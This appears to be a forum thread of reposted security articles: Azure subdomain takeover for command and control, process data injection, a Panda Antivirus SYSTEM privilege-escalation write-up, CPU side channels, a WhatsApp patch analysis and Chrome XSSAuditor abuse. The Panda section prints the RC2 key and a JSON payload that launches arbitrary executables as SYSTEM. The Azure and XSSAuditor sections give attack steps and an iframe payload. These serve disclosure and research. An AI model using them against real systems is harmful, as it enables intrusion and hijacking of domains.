modules can do that I didn’t talk about: Memory initialization: Memory can be initalized with data in the WebAssembly file. Take a look at datastring in the memory initializers and [data segments]. Tables: Tables are mostly useful to implement concepts like function points and consequently patterns like dynamic dispatch or dynamic linking. Globals: Yes, you can have global variables. [Many, many other operations on stack values][numberic instructions]. and probably other stuff ?♂️ AssemblyScript Writing Wat by hand can feel a bit awkward and is probably not the most productive way to create WebAssembly modules. AssemblyScript is a language with TypeScript’s syntax compiles to WebAssembly and closely mimicks the capabilities of the WebAssembly VM. The functions that are provided by the standard library often map straight to WebAssembly VM instructions. I highly recommend taking a look! Conclusion Is Wat useful for your daily life as a web developer? Probably not. I have found it useful in the past to be able to inspect a Wasm file to understand why something was going wrong. It also helped me understand more easily how Emscripten is able emulate a filesystem or how Rust’s wasm-bindgen is able to expose DOM APIs even though WebAssembly has no access to them (by default). As I said before: This post is not required reading for any web developer. But it can be handy to know your way around wasm2wat and Wat if you are messing around with WebAssembly. Surma, 2019-05-17 Sursa: https://dassur.ma/things/raw-wasm/
-
Azure Apps for Command and Control Azure Apps are often subject to subdomain takeovers, or you might even want to use Azure Apps for Command and Control! Why Azure Apps? Azure applications are often used by organisations to host websites. We can see many significant sites using them; the market share is quite large. We often hear and see Azure Apps appearing in bug bounties via. the likes of subdomain takeover vulnerabilities, see: Starbucks disclosed on HackerOne: Subdomain takeover on... Subdomain takeover possible on one of Starbucks's subdomain. The subdomain pointed to Microsoft Azure Cloud App which was no longer registered under Azure. Detailed write-up: https://0xpatrik.com/subdomain-takeover-starbucks/ hackerone.com Azure bug bounty Pwning Red Hat Enterprise Linux | Rants of a software engineer Acquired administrator level access to all of the [Microsoft Azure](https://azure.microsoft.com) managed [Red Hat Update Infrastructure](https://access.redhat.com/documentation/en/red-hat-update-infrastructure/3.0.beta.1/paged/system-administrator-guide/chapter-1-about-red-hat-update-infrastructure) that supplies all the packages for all [Red Hat Enterprise Linux](https://www.redhat.com/en/technologies/linux-platforms/enterprise-linux) instances booted from the Azure marketplace. ianduffy.ie What are we doing here? Although you might be thinking, "I can't take over people's domains and use it as command and control or for phishing in our engagements!". Sure, but it could very well be possible that your customer's subdomains are vulnerable - it's always worth checking. To exploit and use a subdomain takeover, you would've had to write some code and deploy it on Azure apps; I gave up. I went and just wrote a Python script to proxy all the traffic to my selected host over HTTPS. This way, we can re-use this code as many times as we want, for dynamic content feeding through Azure Apps. Subdomain Takeover via. Azure App Overview A subdomain takeover state via. Azure App is when a customer of Azure uses Azure Apps, configures their domain to point to the Azure App, has some fun with it, and then one day decides that they don't want to use it anymore, so decide to kill off the Azure App - but they don't delete the record pointing to Azure. You might be wondering why this happens? There are many reasons, we're not here to discuss, but the basic ones I hear of are: Cloud infrastructure deployment team is not the same team as the DNS management team. Hence lost in communication pipelines somewhere. The person does not know that the DNS record still pointing to Azure would be an issue. "Why does it matter if someone's hosting stuff on our subdomain? They aren't hacking us." Whatever the reason may be, you can be sure that these vulnerabilities often prop up on assessments and can be used to hide under the radar of the blue team. Let's be clear; I've found the following types of organisations to be vulnerable: Airline subdomains Big Four / Large consultancy subdomains Energy company subdomains Global and local bank subdomains Global retailer subdomains Government subdomains Insurance subdomains Microsoft subdomains Phone manufacturer subdomains Telecom subdomains Transport subdomains So yeah, it's not exactly a small issue. For the unethical, it's a big surface. For the professionals doing Attack Simulation engagements, we still have a good chance our customer might have an associated domain's subdomain that might be vulnerable. How does it work? On this occasion, I've deliberately taken my domain of megacorp.icu and set a vulnerable subdomain pointing to Azure Apps. Specifically: myvulnerableapp.azurewebsites.net. Azure websites are not the only Azure App domain extension, the ones I generally look out for (when it comes to Azure Apps specifically) are: *.cloudapp.net *.cloudapp.azure.com *.azurewebsites.net Take a look at the following vulnerable DNS record: You can see that there's a missing slot, and no A name record for the final IP to connect to. Ths is because the myvulnerableapp is not registered in Azure Apps. Let's exploit it To exploit this, login to the Azure console, and create a new Azure App: Make sure that you create an F1 instance, in my opinion. Unless of course you're mega rich and don't mind paying like per hour for the premium instance (which I did, and ended up being billed US$200 before I even knew what happened). After the instance is ready, I like to start with a template: git clone https://github.com/Azure-Samples/python-docs-hello-world Then cd into it, and edit the application.py file (with the code from my GitHub): Add urllib2 to the requirements.txt file: Save the file. To skip the previous steps of picking F1 and using the GUI, you can create the whole app and deploy from CLI: Test that the page works by visiting the URL: Once it's working, you can go to the Azure portal and configure the custom domains as shown below: Once you've added the record, you can do a DNS lookup again, and you will see that it's now completed changed. See following screenshot: Visit the domain we took over of hansolo.megacorp.icu and you can see our content from our C2 server: If you want to use HTTPS, you will need to upload your SSL certificate to the Azure portal and bind the SSL certificate to it. Video For those that prefer a video to learn from, here you go! Git the goods https://github.com/vysecurity/AzureAppC2 Sursa: https://vincentyiu.co.uk/red-team/attack-infrastructure/azure-apps-for-command-and-control
-
Inserting data into other processes’ address space May 18, 2019 in Anti-*, Anti-Forensics, Code Injection, Compromise Detection, EDR, Random ideas Code Injection almost always requires some sort of direct inter-process communication to inject the payload. Typically, the injecting process will first plant the shellcode inside other process’ address space, and then will attempt to trigger the execution of that code via remote thread, APC, patching (e.g. of NtClose function), or one of many recently described code execution tricks, etc.. There are obviously other more friendly alternatives, but mainly focused on loading a DLL in a forced/manipulated way (e.g. using LOLBIN techniques, phantom DLL loading, side-loading /OS bugs, plugX etc./, API trickery, etc.). Over last few months I had discussions with many malware analysts and vulnerability researchers about various code/data injection tricks… This post is trying to give a very high level summary of available data injection tricks. Yes, the WriteProcessMemory and NtWriteVirtualMemory are not enough anymore (obviously!) but they are not the only option either… Note here that actual code execution is a different story and not always possible. And actually, it is most of the time not even possible, but in this post we don’t care. This post is focusing primarily on ‘what-if’ scenarios… not all of them have to be successful. Okay, for the lack of a better incentive… just think of injecting EICAR string into other processes just to see how the existing/running AV / EDR will react. Curious? I sure am ! And if you need an immediate example – look at this post. We can instrument csrss.exe to receive any data we want by triggering the hard error with… a message a.k.a. data we fully control. We don’t even need to craft a dedicated file – we could simply call the NtRaiseHardError API with appropriate arguments… Anyways… let’s come back to the data injection. When we start thinking of possible injection avenues they are all over the place… Well… many articles were written about interprocess communication (IPC) and this is the first place where we can look at what’s available. As per the MS article, the most popular IPC mechanisms are: Clipboard COM Data Copy DDE File Mapping Mailslots Pipes RPC Windows Sockets But there is more… For example, if you spawn a child process, you can pass data to it via the command line argument or via the environment block – this is because you can control these buffers 100% – you are the (bad) parent process after all!. The command line-as-a-code-inject trick is something I saw many years ago (at least 12!) so it’s definitely not my original idea. For the second technique I am not sure there is any PoC, but for it to succeed, the environment block requires the data/code to be in a textual form with series of string=value pairs. Yes, actual environment variables and their values, or lookalikes. As with everything, there is already an existing body of knowledge to address that last bit e.g. English Shellcode (PDF warning) from Johns Hopkins University. For GUI applications, there are windows messages and their wrappers (e.g. SetWindowText, but also specific control messages e.g. WM_SETTEXT), and common control-specific messages (not covered here in detail); there are also windows properties (SetProp), specific commands to add/remove items from menus, etc. Then there is a good old clipboard, Accessibility functions, WM_COPYDATA message, and many interfaces allowing remote programs to access some of the application data – often using some legacy method (e.g. IWebBrowser2, DDE). We can also play with resources and modify them, where applicable e.g. with MUI file poisoning nothing stops us from injecting extra data to signed processes using resources tweaked to our needs! In some cases Registry Entries or configuration files (.ini, but also proprietary files) could work too – especially these that are always used by the target application and accessed/refreshed often (e.g. wincmd.ini for Total Commander). Anytime the program loads these settings/registry values they will be loaded somewhere into program memory (the data doesn’t even need to be correct all the time as long as it is being read by the target application and is stored in memory, even if temporarilyy). Small shellcodes could replace Registry settings, in particular strings, paths and data ‘guaranteed’ to be available immediately, or almost immediately (f.ex. the MRU list), etc. Depending on how the target application stores/uses that data (locally, on stack, or globally in some non-volatile memory area) it could remain persistent for a while. And in some cases, e.g. with text editors, spreadsheets, files could be loaded anytime the application is re-launched. Data/code could be stored in templates, highlighting files, scripts, etc. It’s very vague, of course, but it’s not hard to find locations that could be interesting e.g. for Regedit you could use its bookmarking area (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Regedit\Favorites) to inject some data into that process. For Ultraedit you could look at Highlighting files, wincmd.ini is a great target for Total Commander, etc. Registry settings are very interesting in general. What if e.g. we created a fake font, installed it on a targeted system and then made sure that it is loaded as a default for cmd.exe or powershell.exe terminal windows? The font could be a copy of one of the standard fonts, but additionally include some extra data ? What about a corporate wallpaper that could be slightly modified and include a small shell-code that would be always loaded to memory after logon (some consideration for bitmap storage format in memory is needed for this case, but it’s trivial given the number of device context- and bitmap-related functions offered by GDI). Then we have address books for various programs, templates, databases (e.g. SQLITE3 in so many applications), backup files, icons, cursors, pictures, animations, and so on and so forth. If any of these can be loaded to memory by default, it is a possible place to inject whatever we want. Then there are trivial cases: for example Notepad loading a binary file into its window won’t make sense as we will see the corrupted garbage, but we only care about what’s in memory, not what’s displayed on GUI; if the binary resides in memory for a while, then it could be used as a data/code storage (i.e. shellcode could be loaded into Notepad memory directly via command line argument, from a file; also, as mentioned above the shellcode could appear as a typical English text so there is no issues with encoding/code mapping). This can go and on… Many of these leave a lot of forensic traces in memory, of course, but I believe they will become harder and harder to pinpoint using traditional DFIR methods. The truth is that data sharing (read: injection) is actually a BIG part of native Windows architecture. While I focused on trivial cases, let’s not forget about many others to which I already alluded earlier: shared memory sections, pipes, sockets, IOCTLs accepting incorrect buffers, and many other interprocess communication methods – they all will sooner or later be abused one way or another. Living Off the land. Bring Your Own Vulnerability. Bring Your Own Lolbin. Blend in. IMHO abusing the Native Architecture and signed executables and drivers is going to be something we will see more on regular basis. As usual, seasoned vulnerability researchers and companies focused on finding escalation of privileges, and local/remote code execution bugs pave this road for many years, but it’s only now gaining its momentum… So, yes… IMHO from a defense perspective it’s a battle already lost. Let’s hope AV and EDRs will focus more on plain-vanilla Data Injection trickery soon… Or we all succumb to a completely new Windows paradigm — apps. No more hacking, no more reversing, just a controlled, sandboxed, “telemetrized” environment and… the end of some era… a better one than the one that follows… at least, IMHO Sursa: http://www.hexacorn.com/blog/2019/05/18/inserting-data-into-other-processes-address-space/
-
Tuesday, May 14, 2019 Panda Antivirus - Local Privilege Escalation (CVE-2019-12042) Hello, This blogpost is about a vulnerability that I found in Panda Antivirus that leads to privilege escalation from an unprivileged account to SYSTEM. The affected products are : Versions < 18.07.03 of Panda Dome, Panda Internet Security, Panda Antivirus Pro, Panda Global Protection, Panda Gold Protection, and old versions of Panda Antivirus >= 15.0.4. The vulnerability was fixed in the latest version : 18.07.03 The Vulnerability: The vulnerable system service is AgentSvc.exe. This service creates a global section object and a corresponding global event that is signaled whenever a process that writes to the shared memory wants the data to be processed by the service. The vulnerability lies in the weak permissions that are affected to both these objects allowing "Everyone" including unprivileged users to manipulate the shared memory and the event. (Click to zoom) (Click to zoom) Reverse Engineering and Exploitation : The service creates a thread that waits indefinitely on the memory change event and parses the contents of the memory when the event is signaled. We'll briefly describe what the service expects the contents of the memory to be and how they're interpreted. When the second word from the start of the shared memory isn't zero, a call is made to the function shown below with a pointer to the address of the head of a list. (Click to zoom) The structure of a list element looks like this, we'll see what that string should be representing shortly : typedef struct StdList_Event { struct StdList_Event* Next; struct StdList_Event* Previous; struct c_string { union { char* pStr; char str[16]; }; unsigned int Length; unsigned int InStructureStringMaxLen; } DipsatcherEventString; //.. }; As shown below, the code expects a unicode string at offset 2 of the shared memory. It instantiates a "wstring" object with the string and converts the string to ANSI in a "string" object. Moreover, a string is initialized on line 50 with "3sa342ZvSfB68aEq" and passed to the function "DecodeAndDecryptData" along with the attacker's controlled ANSI string and a pointer to an output string object. (Click to zoom) The function simply decodes the string from base64 and decrypts the result using RC2 with the key "3sa342ZvSfB68aEq". So whatever we supply in the shared memory must be RC2 encrypted and then base64 encoded. (Click to zoom) When returning from the above function, the decoded data is converted to a "wstring" (indicating the nature of the decrypted data). The do-while loop extracts the sub-strings delimited by '|' and inserts each one of them in the list that was passed in the arguments. (Click to zoom) When returning from this function, we're back at the thread's main function (code below) where the list is traversed and the strings are passed to the method InsertEvent of the CDispatcher class present in Dispatcher.dll. We'll see in a second what an event stands for in this context. (Click to zoom) In Dispatcher.dll we examine the CDispatcher::InsertEvent method and see that it inserts the event string in a CQueue queue. (Click to zoom) The queue elements are processed in the CDispatcher::Run method running in a separate thread as shown in the disassembly below. (Click to zoom) The CRegisterPlugin::ProcessEvent method does parsing of the attacker controlled string; Looking at the debug error messages, we find that we're dealing with an open-source JSON parser : https://github.com/udp/json-parser (Click to zoom) Now that we know what the service expects us to send it as data, we need to know the JSON properties that we should supply. The method CDispatcher::Initialize calls an interesting method CRegisterPlugins::LoadAllPlugins that reads the path where Panda is installed from the registry then accesses the "Plugins" folder and loads all the DLLs there. A DLL that caught my attention immediately was Plugin_Commands.dll and it appears that it executes command-line commands. (Click to zoom) Since these DLLs have debugging error messages, they make locating methods pretty easy. It only takes a few seconds to find the Run method shown below in Plugin_Commands.dll. (Click to zoom) In this function we find the queried JSON properties from the input : (Click to zoom) It also didn't hurt to intercept some of these JSON messages from the kernel debugger (it took me a few minutes to intercept a command-line execute event). (Click to zoom) The ExeName field is present as we saw in the disassembly, an URL, and two md5 hashes. By then, I was wondering if it was possible to execute something from disk and what properties were mandatory and which were optional. Tracking the SourcePath property in the Run method's disassembly we find a function that parses the value of this property and determines whether it points to an URL or to a file on disk. So it seems that it is possible to execute a file from disk by using the file:// URI. (Click to zoom) Looking for the mandatory properties, we find that we must supply at minimum these two : ExeName and SourcePath (as shown below). Fails (JZ fail) if the property ExeName is absent Fails if the property SourcePath is absent However when we queue a "CmdLineExecute" event with only these two fields set, our process isn't created. While debugging this, I found that the "ExeMD5" property is also mandatory and it should contain a valid MD5 hash of the executable to run. The function CheckMD5Match dynamically calculates the file hash and compares it to the one we supply in the JSON property. (Click to zoom) And if successful the execution flow takes as to "CreateProcessW". (Click to zoom) Testing with the following JSON (RC2 + Base64 encoded) we see that we successfully executed cmd.exe as SYSTEM : { "CmdLineExecute": { "ExeName": "cmd.exe", "SourcePath": "file://C:\\Windows\\System32", "ExeMD5": "fef8118edf7918d3c795d6ef03800519" } } (Click to zoom) However when we try to supply an executable of our own, Panda will detect it as malware and delete it, even if the file is benign. There is a simple bypass for this in which we tell cmd.exe to start our process for us instead. The final JSON would look like something like this : { "CmdLineExecute": { "ExeName": "cmd.exe", "Parameters": "/c start C:\\Users\\VM\\Desktop\\run_me_as_system.exe", "SourcePath": "file://C:\\Windows\\System32", "ExeMD5": "fef8118edf7918d3c795d6ef03800519" //MD5 hash of CMD.EXE } } The final exploit drops a file from the resource section to disk, calculates the MD5 hash of cmd.exe present on the machine, builds the JSON, encrypts then encodes it, and finally writes the result to the shared memory prior to signaling the event. Also note that the exploit works without recompiling on all the products affected under all supported Windows versions. (Click to zoom) The exploit's source code is on my GitHub page, here is a link to the repository : https://github.com/SouhailHammou/Panda-Antivirus-LPE Thanks for reading and until another time Follow me on Twitter : here Posted by Souhail Hammou at 8:22 PM Sursa: https://rce4fun.blogspot.com/2019/05/panda-antivirus-local-privilege.html
-
Alegerea unei facultati bazate pe securitate cibernetica
Nytro replied to Oklah's topic in Discutii incepatori
Nu te baza pe facultate pentru a invatat securitate. Exista ceva programe de master, insa nu stiu nimic de licenta. Fa o facultate de informatica, o sa te ajute sa inveti cate ceva din mai multe domenii. Cauta posturi pe forum legate de alegerea facultatii. Intre timp, invata singur, fa CTF-uri, Internetul e plin de resurse (vezi sectiunea Tutoriale Engleza de aici de pe forum).- 1 reply
-
- 2
-
-
-
Hey folks, time for some good ol' fashioned investigation! Open Rights Group & Who Targets Me are monitoring European electrions. GDPR breaches, privacy infringements, the works! They released a browser extension that records every political ad served to users on Facebook, including the data they used to target individuals. If you use Facebook, install the extension and browse your Facebook feed freely. If you aren't on Facebook, help us out by spreading the word. No additional personal information is recorded. If you have any concerns about this, ping me! We can pool all our questions and I'll send them an open letter, from the Security Espresso community. This information is via our good friends at Asociatia pentru Tehnologie si Internet. https://whotargets.me/en/ https://www.openrightsgroup.org/campaigns/who-targets-me-faq Via: https://www.facebook.com/secespresso/
-
Adventures in Video Conferencing - Natalie Silvanovich - INFILTRATE 2019 INFILTRATE 2020 will be held April 23/24, Miami Beach, Florida, infiltratecon.com
-
- 1
-
-
System Down: A systemd-journald Exploit Read the advisory Accompanying exploit: system-down.tar.gz Sursa: https://www.qualys.com/research/security-advisories/
-
- 1
-
-
RIDL and Fallout: MDS attacks Attacks on the newly-disclosed "MDS" hardware vulnerabilities in Intel CPUs The RIDL and Fallout speculative execution attacks allow attackers to leak confidential data across arbitrary security boundaries on a victim system, for instance compromising data held in the cloud or leaking your information to malicious websites. Our attacks leak data by exploiting the newly disclosed Microarchitectural Data Sampling (or MDS) side-channel vulnerabilities in Intel CPUs. Unlike existing attacks, our attacks can leak arbitrary in-flight data from CPU-internal buffers (Line Fill Buffers, Load Ports, Store Buffers), including data never stored in CPU caches. We show that existing defenses against speculative execution attacks are inadequate, and in some cases actually make things worse. Attackers can use our attacks to obtain sensitive data despite mitigations, due to vulnerabilities deep inside Intel CPUs. Sursa: https://mdsattacks.com/
-
ZombieLoad Attack Watch out! Your processor resurrects your private browsing-history and other sensitive data. After Meltdown, Spectre, and Foreshadow, we discovered more critical vulnerabilities in modern processors. The ZombieLoad attack allows stealing sensitive data and keys while the computer accesses them. While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs. These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys. The attack does not only work on personal computers but can also be exploited in the cloud. Make sure to get the latest updates for your operating system! Sursa: https://zombieloadattack.com/
-
The NSO WhatsApp Vulnerability – This is How It Happened May 14, 2019 Earlier today the Financial Times published that there is a critical vulnerability in the popular WhatsApp messaging application and that it is actively being used to inject spyware into victims phones. According to the report, attackers only need to issue specially crafted VoIP calls to the victim in order to infect it with no user interaction required for the attack to succeed. As WhatsApp is used by 1.5bn people worldwide, both on Android phones and iPhones, the messaging and voice application is known to be a popular target for hackers and governments alike. Immediately after the publication went live, Check Point Research began analyzing the details about the now-patched vulnerability, referred to as CVE-2019-3568. Here is the first technical analysis to explain how it happened. Technical Details Facebook’s advisory describe it as a “buffer overflow vulnerability” in the SRTCP protocol, so we started by patch-diffing the new WhatsApp version for android (v2.19.134, 32-bit program) in search for a matching code fix. Soon enough we stumbled upon two code fixes in the SRTCP module: Size Check #1 The patched function is a major RTCP handler function, and the added fix can be found right at its start. The added check verifies the length argument against a maximal size of 1480 bytes (0x5C8). During our debugging session we confirmed that this is indeed a major function in the RTCP module and that it is called even before the WhatsApp voice call is answered. Size Check #2 In the flow between the two functions we can see that the same length variable is now used twice during the newly added sanitation checks (marked in blue): Validation that the packet’s length field doesn’t exceed the length. Additional check that the length is one again <= 1480, right before a memory copy. As one can see, the second check includes a newly added log string that specifically say it is a sanitation check to avoid a possible overflow. Conclusion WhatsApp implemented their own implementation of the complex SRTCP protocol, and it is implemented in native code, i.e. C/C++ and not Java. During our patch analysis of CVE-2019-3568, we found two newly added size checks that are explicitly described as sanitation checks against memory overflows when parsing and handling the network packets in memory. As the entire SRTCP module is pretty big, there could be additional patches that we’ve missed. In addition, judging by the nature of the fixed vulnerabilities and by the complexity of the mentioned module, there is also a probable chance that there are still additional unknown parsing vulnerabilities in this module. Sursa: https://research.checkpoint.com/the-nso-whatsapp-vulnerability-this-is-how-it-happened/
-
Adversarial Examples for Electrocardiograms Xintian Han, Yuxuan Hu, Luca Foschini, Larry Chinitz, Lior Jankelson, Rajesh Ranganath (Submitted on 13 May 2019) Among all physiological signals, electrocardiogram (ECG) has seen some of the largest expansion in both medical and recreational applications with the rise of single-lead versions. These versions are embedded in medical devices and wearable products such as the injectable Medtronic Linq monitor, the iRhythm Ziopatch wearable monitor, and the Apple Watch Series 4. Recently, deep neural networks have been used to classify ECGs, outperforming even physicians specialized in cardiac electrophysiology. However, deep learning classifiers have been shown to be brittle to adversarial examples, including in medical-related tasks. Yet, traditional attack methods such as projected gradient descent (PGD) create examples that introduce square wave artifacts that are not physiological. Here, we develop a method to construct smoothed adversarial examples. We chose to focus on models learned on the data from the 2017 PhysioNet/Computing-in-Cardiology Challenge for single lead ECG classification. For this model, we utilized a new technique to generate smoothed examples to produce signals that are 1) indistinguishable to cardiologists from the original examples 2) incorrectly classified by the neural network. Further, we show that adversarial examples are not rare. Deep neural networks that have achieved state-of-the-art performance fail to classify smoothed adversarial ECGs that look real to clinical experts. Subjects: Signal Processing (eess.SP); Cryptography and Security (cs.CR); Machine Learning (cs.LG); Machine Learning (stat.ML) Cite as: arXiv:1905.05163 [eess.SP] (or arXiv:1905.05163v1 [eess.SP] for this version) Submission history From: Xintian Han [view email] [v1] Mon, 13 May 2019 17:47:25 UTC (1,236 KB) Which authors of this paper are endorsers? | Disable MathJax (What is MathJax?) Sursa: https://arxiv.org/abs/1905.05163
-
Chrome switching the XSSAuditor to filter mode re-enables old attack Fri 10 May 2019 Recently, Google Chrome changed the default mode for their Cross-Site Scripting filter XSSAuditor from block to filter. This means that instead of blocking the page load completely, XSSAuditor will now continue rendering the page but modify the bits that have been detected as an XSS issue. In this blog post, I will argue that the filter mode is a dangerous approach by re-stating the arguments from the whitepaper titled X-Frame-Options: All about Clickjacking? that I co-authored with Mario Heiderich in 2013. After that, I will elaborate XSSAuditor's other shortocmings and revisit the history of back-and-forth in its default settings. In the end, I hope to convince you that XSSAuditor's contribution is not just neglegible but really negative and should therefore be removed completely. JavaScript à la Carte When you allow websites to frame you, you basically give them full permission to decide, what part of JavaScript of your very own script can be executed and what cannot. That sounds crazy right? So, let’s say you have three script blocks on your website. The website that frames you doesn’t mind two of them - but really hates the third one. maybe a framebuster, maybe some other script relevant for security purposes. So the website that frames you just turns that one script block off - and leave the other two intact. Now how does that work? Well, it’s easy. All the framing website is doing, is using the browser’s XSS filter to selectively kill JavaScript on your page. This has been working in IE some years ago but doesn’t anymore - but it still works perfectly fine in Chrome. Let’s have a look at an annotated code example. Here is the evil website, framing your website on example.com and sending something that looks like an attempt to XSS you! Only that you don’t have any XSS bugs. The injection is fake - and resembles a part of the JavaScript that you actually use on your site: <iframe src="//example.com/index.php?code=%3Cscript%20src=%22/js/security-libraries.js%22%3E%3C/script%3E"></iframe> Now we have your website. The content of the code parameter above is part of your website anyway - no injection here, just a match between URL and site content: <!doctype html> <h1>HELLO</h1> <script src="/js/security-libraries.js"></script> <script> // assumes that the libraries are included </script> The effect is compelling. The load of the security libraries will be blocked by Chrome’s XSS Auditor, violating the assumption in the following script block, which will run as usual. Existing and Future Countermeasures So, as we see defaulting to filter was a bad decision and it can be overriden with the X-XSS-Protection: 1; mode=block header. You could also disallow websites from putting you in an iframe with X-Frame-Options: DENY, but it still leaves an attack vector as your websites could be opened as a top-level window. (The Cross-Origin-Opener-Policy will help, but does not yet ship in any major browser). Surely, Chrome might fix that one bug and stop exposing onerror from internal error pages . But that's not enough. Other shortcomings of the XSSAuditor XSSAuditor has numerous problems in detecting XSS. In fact, there are so many that the Chrome Security Team does not treat bypasses as security bugs in Chromium. For example, the XSSAuditor scans parameters individually and thus allows for easy bypasses on pages that have multiple injections points, as an attacker can just split their payload in half. Furthermore, XSSAuditor is only relevant for reflected XSS vulnerabilities. It is completely useless for other XSS vulnerabilities like persistent XSS, Mutation XSS (mXSS) or DOM XSS. DOM XSS has become more prevalent with the rise of JavaScript libraries and frameworks such as jQuery or AngularJS. In fact, a 2017 research paper about exploiting DOM XSS through so-called script gadgets discovered that XSSAuditor is easily bypassed in 13 out of 16 tested JS frameworks History of XSSAuditor defaults Here's a rough timeline 2010 - Paper "Regular expressions considered harmful in client-side XSS filters" published. Outlining design of the XSSAuditor, Chrome ships it with default to filter 2016 - Chrome switching to block due to the attacks with non-existing injections November 2018 - Chrome error pages can be observed in an iframe, due to the onerror event being triggered twice, which allows for cross-site leak attacks ](https://github.com/xsleaks/xsleaks/wiki/Browser-Side-Channels#xss-filters). January 2019 (hitting Chrome stable in April 2019) - XSSAuditor switching back to filter Conclusion Taking all things into considerations, I'd highly suggest removing the XSSAuditor from Chrome completely. In fact, Microsoft has announced they'd remove the XSS filter from Edge last year. Unfortunately, a suggestion to retire XSSAuditor initiated by the Google Security Team was eventually dismissed by the Chrome Security Team. This blog post does not represent the position of my employer. Thanks to Mario Heiderich for providing valuable feedback: Supporting arguments and useful links are his. Mistakes are all mine. Other posts Chrome switching the XSSAuditor to filter mode re-enables old attack Challenge Write-up: Subresource Integrity in Service Workers Finding the SqueezeBox Radio Default SSH Passwort New CSP directive to make Subresource Integrity mandatory (`require-sri-for`) Firefox OS apps and beyond Teacher's Pinboard Write-up A CDN that can not XSS you: Using Subresource Integrity The Twitter Gazebo German Firefox 1.0 ad (OCR) My thoughts on Tor appliances Subresource Integrity Revoke App Permissions on Firefox OS (Self) XSS at Mozilla's internal Phonebook Tales of Python's Encoding On the X-Frame-Options Security Header html2dom Security Review: HTML sanitizer in Thunderbird Week 29 2013 The First Post Sursa: https://frederik-braun.com/xssauditor-bad.html
-
- 1
-
-
AntiFuzz: Impeding Fuzzing Audits of Binary Executables Authors: Emre Güler, Cornelius Aschermann, Ali Abbasi, and Thorsten Holz, Ruhr-Universität Bochum Abstract: A general defense strategy in computer security is to increase the cost of successful attacks in both computational resources as well as human time. In the area of binary security, this is commonly done by using obfuscation methods to hinder reverse engineering and the search for software vulnerabilities. However, recent trends in automated bug finding changed the modus operandi. Nowadays it is very common for bugs to be found by various fuzzing tools. Due to ever-increasing amounts of automation and research on better fuzzing strategies, large-scale, dragnet-style fuzzing of many hundreds of targets becomes viable. As we show, current obfuscation techniques are aimed at increasing the cost of human understanding and do little to slow down fuzzing. In this paper, we introduce several techniques to protect a binary executable against an analysis with automated bug finding approaches that are based on fuzzing, symbolic/concolic execution, and taint-assisted fuzzing (commonly known as hybrid fuzzing). More specifically, we perform a systematic analysis of the fundamental assumptions of bug finding tools and develop general countermeasures for each assumption. Note that these techniques are not designed to target specific implementations of fuzzing tools, but address general assumptions that bug finding tools necessarily depend on. Our evaluation demonstrates that these techniques effectively impede fuzzing audits, while introducing a negligible performance overhead. Just as obfuscation techniques increase the amount of human labor needed to find a vulnerability, our techniques render automated fuzzing-based approaches futile. Open Access Media USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access. Guler Paper (Prepublication) PDF BibTeX Sursa: https://www.usenix.org/conference/usenixsecurity19/presentation/guler
-
The Origin of Script Kiddie - Hacker Etymology 12 May 2019 Blog TL;DR The term script kiddie probably originated around 1994, but the first public record is from 1996. watch on YouTube Introduction In my early videos I used the slogan "don’t be a script kiddie" in the intro. And quite some time ago I got the following YouTube comment about it: Is "don’t be a script kiddie" a reference to Mr. Robot? Or is it already a thing in general? I think it would be interesting to look for the origin of the term script kiddie and at the same time it gives us an excuse to look into the past, to better understand on what our community is built upon and somewhat honour and remember it. I wish I was old enough to have experienced that time myself to tell you first-hand stories, but unfortunately I’m born in the early 90s and so I’m merely an observer and explorer of the publicly available historical records. But there is fascinating stuff out there that I want to share with you. Phrack The first resource I wanted to check is Phrack. Phrack is probably the longest running ezine as it was started in 1985 by Taran King and Knight Lightning. source: http://www.erik.co.uk/hackerpix/ I highly encourage you to just randomly click around through those old issues and read some random articles. You will find stuff about operating systems and various technologies you might have never heard about - because they don’t exist anymore. But you also find traces of the humans behind all this through the Phrack Pro-Philes and other articles. Maybe checkout the famous hacker manifesto from 1986 - The Conscience of a Hacker. It was written by a teenager, calling himself The Mentor, who probably never thought that his rage induced philosophical writing would go on to influence a whole generation of hackers. But it becomes even more fascinating with the privilege of being here in the future, right now, and looking back. I found this talk from 2002 by The Mentor and he is now a grown man reflecting on his experience about this. It’s emotional and human. And in the end this is what the hacker culture is. It’s full of humans with complex emotions, we shouldn't forget that. Watch on YouTube Anyway, I’m getting really distracted here. Back to script kiddie research. The oldest occurrence of script kiddie we can find is from issue 54, released in 1998, article 9 and 11. [...] when someone posts (say) a root hole in Sun's comsat daemon, our little cracker could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable boxes. It should be noted that this is SCRIPT KIDDIE behavior. And the other is a sarcastic comment about rootshell.com being hacked and them handing over data to law enforcement: Lets give out scripts that help every clueless script kiddie break into thousands of sites worldwide. then narc off the one that breaks into us. So this issue is from 1998, which is already the 90s, but I’m sure there have to be earlier occurrences. Wikipedia is often pretty good with information and references, but unfortunately there are only links going back to the 2000s. Yet Another Bulletin Board System Then I looked at the textfiles.com archive, which is ran by Jason Scott. This is a huuuge archive of old zines, bulletin boards, mailing lists, and more. And so I started to search through that and indeed I found some interesting traces from around 1993/1994 in a BBS called yabbs - yet another bulletin board system created by Alex Wetmore in 1991 at Carnegie Mellon. The first interesting find is from October 1993: Enjoy your K-Rad elite kodez kiddies Here the term kiddie is not prefixed with script, and I’m not sure if it’s “elite code, kiddies” or elite "code kiddies”. But code and script is almost a synonymous and it seems to be used in a very similar derogatory way as the modern terminology. Then in June 1994 there is this message: Codez kiddies just don’t seem to understand that those scripts had to come from somwhere. Hacking has fizzled down to kids running scripts to show off at a 2600 meet. We have again a reference to “codez kiddies” but now the term script also starts to appear in the same sentence. And then in July 1994 it got combined to: Even 99% of the wanker script codez kiddies knows enough to not run scripts on the Department of Defense. Isn’t this fascinating! I believe that 1994 is the year where the term script kiddie started to appear. But this example is still not 100% the modern term... The First Script Kiddie The earliest usage of literally script kiddie I was only able to find in an exploit from 1996. [r00t.1] [crongrab] [public release] Crontab has a bug. You run crontab -e, then you goto a shell, relink the temp fire that crontab is having you edit, and presto, it is now your property. This bug has been confirmed on various versions of OSF/1, Digital UNIX 3.x, and AIX 3.x If, while running my script, you somehow manage to mangle up your whole system, or perhaps do something stupid that 